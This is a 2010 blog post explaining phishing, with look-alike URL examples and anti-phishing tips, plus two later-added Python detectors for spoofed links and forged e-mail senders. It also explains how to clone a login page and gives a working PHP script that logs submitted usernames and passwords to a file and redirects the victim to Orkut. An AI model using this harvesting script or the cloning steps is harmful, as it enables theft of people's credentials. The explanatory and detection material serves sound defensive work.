Thursday, December 2, 2010

PHISHING

  • What is Phishing ?
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.


  • Phishing E-mail :
Phishing is typically carried out by e-mail or instant messaging. Phishing e-mail messages take a number of forms:

1. They might appear to come from your bank or financial institution, a company you regularly do business with, such as Microsoft, or from your social networking site.

2. Spear phishing is a targeted form of phishing in which the e-mail message appears to come from your employer, or from a colleague who would plausibly write to everyone in the company, such as the head of human resources or IT.

3. Phone phishing (also called vishing) scams direct you to call a customer support phone number. A person or an automated voice response system waits on the line to take your account number, personal identification number, password, or other valuable personal data.

Here is an example of what a phishing scam in an e-mail message might look like.


  • Phishing Techniques :
1. Link Manipulation:

Misspelled URLs and the use of subdomains are common tricks used by phishers. These example URLs are all look-alikes of microsoft.com (a dropped letter, and two swapped letter pairs):

www.micosoft.com
www.mircosoft.com
www.micorsoft.com

Another spoofing method uses links like http://www.facebook.ripway.com/. Read the host name from the right: the registered domain is ripway.com (a free hosting site), and "facebook" is only a subdomain the attacker created on it. The URL points to the attacker's fake Facebook login page hosted on ripway, not to facebook.com.

2. Filter Evasion:

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.
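The link-manipulation tricks above (look-alike domains, a brand name used as a subdomain of an unrelated site, and, as in the PayPal example near the end of the post, a brand name that only appears in the URL path) can be checked mechanically. The following is an added example, not code from the original post; the trusted-domain list, the brand list derived from it and the edit-distance threshold of 2 are assumptions for illustration, and the "registrable domain" helper deliberately takes the last two labels only.

```python
"""Link checks for the tricks described under "Link Manipulation":
misspelled (look-alike) domains, a brand name used as a subdomain of an
unrelated site, and a brand name appearing only in the URL path.
This is an added example, not code from the original post. The trusted
domain list and the threshold are assumptions for illustration."""
from urllib.parse import urlsplit

# Hypothetical allowlist: registrable domains the user actually intends to visit.
TRUSTED_DOMAINS = {"microsoft.com", "facebook.com", "paypal.com"}
# Brand words derived from the allowlist ("microsoft", "facebook", "paypal").
BRANDS = {d.split(".")[0] for d in TRUSTED_DOMAINS}


def registrable_domain(host):
    """Return the last two labels of a hostname,
    e.g. 'www.facebook.ripway.com' -> 'ripway.com'.
    Simplification: production code should use the Public Suffix List so
    that hosts under multi-label suffixes such as .co.uk are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance: insertions, deletions and substitutions cost 1 each."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_link(url):
    """Return (verdict, registrable_domain) for a URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return "trusted", domain
    # Subdomain trick: 'facebook' appears as a label left of the real domain.
    left_labels = host.split(".")[:-2]
    if any(brand in left_labels for brand in BRANDS):
        return "subdomain-spoof", domain
    # Typosquat: the registrable domain is a near miss of a trusted one.
    # Threshold 2 catches a dropped letter and a swapped letter pair.
    if any(edit_distance(domain, t) <= 2 for t in TRUSTED_DOMAINS):
        return "lookalike", domain
    # Path trick: the brand name is only a directory on an unrelated site.
    if any(brand in parts.path.lower() for brand in BRANDS):
        return "path-spoof", domain
    return "unknown", domain


if __name__ == "__main__":
    # The URLs the post lists, plus one genuine address for contrast.
    for u in ["https://www.microsoft.com/", "http://www.micosoft.com/",
              "http://www.mircosoft.com/", "http://www.micorsoft.com/",
              "http://www.facebook.ripway.com/",
              "http://www.yougotscammed.com/paypal/login.htm"]:
        print(u, "->", classify_link(u))
```

The order of the checks matters: the allowlist is consulted first so that a genuine www.microsoft.com never trips the look-alike test, and the subdomain test looks only at labels to the left of the registrable domain, which is exactly the part of the host a phisher controls on a hosting service.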

  • Fake Login Page :
A fake login page looks exactly like the original login page of the target website, usually because it is a saved copy of the real page's HTML. The one meaningful change is in the page source: the form's action attribute, which would normally submit the credentials to the real site, is pointed at a PHP script on the attacker's server. That script serves two purposes:

1. It captures the submitted form fields (username and password) and appends them to a log file on the attacker's server, which the attacker reads later.

2. It redirects the victim to the original site so that the login attempt looks normal; the victim typically assumes a mistyped password and logs in again on the genuine page.

Script Code (the post's harvesting script, with comments added; the log file name log.txt and the Orkut redirect target are the post's own):

<?php
// Queue a redirect to the genuine site. PHP only sends the Location header
// when the script finishes, so the logging below still runs first.
header('Location: http://www.orkut.com/Home.aspx');

// Open the log in append mode so every victim's submission is added to it.
// Note that log.txt sits next to the script, inside the web root, with no
// access control: anyone who guesses the name can read every captured password.
$handler = fopen("log.txt", "a");

// Write every POSTed field as name=value, one field per line.
foreach ($_POST as $variable => $value) {
    fwrite($handler, $variable);
    fwrite($handler, "=");
    fwrite($handler, $value);
    fwrite($handler, "\r\n");
}

// A blank line separates one victim's record from the next.
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>


  • Phishing Targets :
1. Social networking sites like Facebook, MySpace and Orkut are now a prime target of phishing, since the personal details on such sites can be used for identity theft.

2. The RapidShare file sharing site has been targeted by phishing to obtain a premium account.

3. On the attacker side, almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network, based in St. Petersburg.

4. eBay, PayPal and online banks are also targeted.




  • Anti Phishing Info :
1. Never assume that an email is valid based on the sender’s email address. The email may be forged.

2. A trusted bank such as CITIBANK will never ask you for your full name and password in a CITIBANK email.

3. Treat unexpected attachments or software in an e-mail from a trusted organization as suspicious. Banks and payment services do not distribute software updates or security tools by e-mail.

4. Always ensure that you are on a secure (HTTPS) website, with a certificate issued for the domain you expect, before submitting credit card or other sensitive information. HTTPS only proves that the connection is encrypted to whoever holds the certificate, not that the site is legitimate, so the domain in the address bar still matters.

5. Get in the habit of looking at the address bar. Were you directed to paypal.com? Or somewhere different, like http://www.yougotscammed.com/paypal/login.htm, where "paypal" is only a folder on an unrelated site?
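Items 1 and 5 of the list above can be applied to a raw e-mail before anyone clicks: the From header's display name is free text and proves nothing, the envelope sender (Return-Path) may come from a different domain than the From address, and the visible text of a link may disagree with its real href. The following is an added example, not code from the original post; both messages are constructed for the example, the brand list is an assumption, and the registrable-domain helper takes the last two labels only.

```python
"""The sender and address-bar checks from the list above, applied to a raw
e-mail: is the From header consistent with itself and with the envelope
sender, and does each link go where its visible text says?
This is an added example, not code from the original post. Both messages
below are constructed for the example, and the brand list is an assumption."""
import email
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

BRANDS = {"paypal", "citibank", "ebay"}  # hypothetical list of impersonated brands

# Constructed phishing message: brand in the display name, unrelated address,
# a different bounce domain, and a link whose text and target disagree.
PHISHING_MESSAGE = b"""\
Return-Path: <bounce@bulk-sender.example.com>
From: "PayPal Security" <service@paypa1-secure.example.net>
To: victim@example.org
Subject: Your account has been limited
Content-Type: text/html; charset=us-ascii

<html><body><p>Please confirm your details at
<a href="http://www.yougotscammed.com/paypal/login.htm">https://www.paypal.com/</a>
within 24 hours.</p></body></html>
"""

# Constructed legitimate message for contrast.
CLEAN_MESSAGE = b"""\
Return-Path: <bounce@paypal.com>
From: "PayPal" <service@paypal.com>
To: victim@example.org
Subject: Your monthly statement
Content-Type: text/html; charset=us-ascii

<html><body><p>View it at <a href="https://www.paypal.com/">https://www.paypal.com/</a>.</p></body></html>
"""


def registrable_domain(host):
    """Last two labels of a host; use the Public Suffix List in real code."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyze_message(raw):
    """Return a list of (finding, detail) tuples; an empty list means no red flags."""
    msg = email.message_from_bytes(raw)
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, return_path = parseaddr(msg.get("Return-Path", ""))
    from_domain = registrable_domain(from_addr.rpartition("@")[2])
    rp_domain = registrable_domain(return_path.rpartition("@")[2])

    # Item 1: the display name is free text; a brand there means nothing
    # unless the address itself is in that brand's domain.
    for brand in sorted(BRANDS):
        if brand in from_name.lower() and brand not in from_domain:
            findings.append(("display-name-mismatch", f"{from_name!r} <{from_addr}>"))

    # Item 1, continued: envelope sender (Return-Path) from a different domain.
    # Only a signal: legitimate bulk mailers also use separate bounce domains.
    if return_path and rp_domain != from_domain:
        findings.append(("return-path-mismatch", f"From {from_domain}, Return-Path {rp_domain}"))

    # Item 5: when the link text looks like a URL, compare it with the real href.
    if msg.get_content_type() == "text/html":
        collector = LinkCollector()
        collector.feed(msg.get_payload(decode=True).decode("utf-8", "replace"))
        for href, text in collector.links:
            shown = text if "://" in text else ("http://" + text if text.startswith("www.") else "")
            if not shown:
                continue
            shown_domain = registrable_domain(urlsplit(shown).hostname or "")
            real_domain = registrable_domain(urlsplit(href).hostname or "")
            if shown_domain != real_domain:
                findings.append(("link-text-mismatch", f"shows {shown_domain}, goes to {real_domain}"))
    return findings


if __name__ == "__main__":
    for name, raw in [("phishing", PHISHING_MESSAGE), ("clean", CLEAN_MESSAGE)]:
        print(name, analyze_message(raw) or "no findings")
```

The Return-Path check is deliberately reported as a signal rather than a verdict: mailing services legitimately bounce to their own domains, so on its own it would produce false positives, while the display-name and link-text mismatches are much harder to explain innocently.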



Happy Hacking...Enjoy...


For educational purpose only...Do not misuse it...


If you like this post, comment please...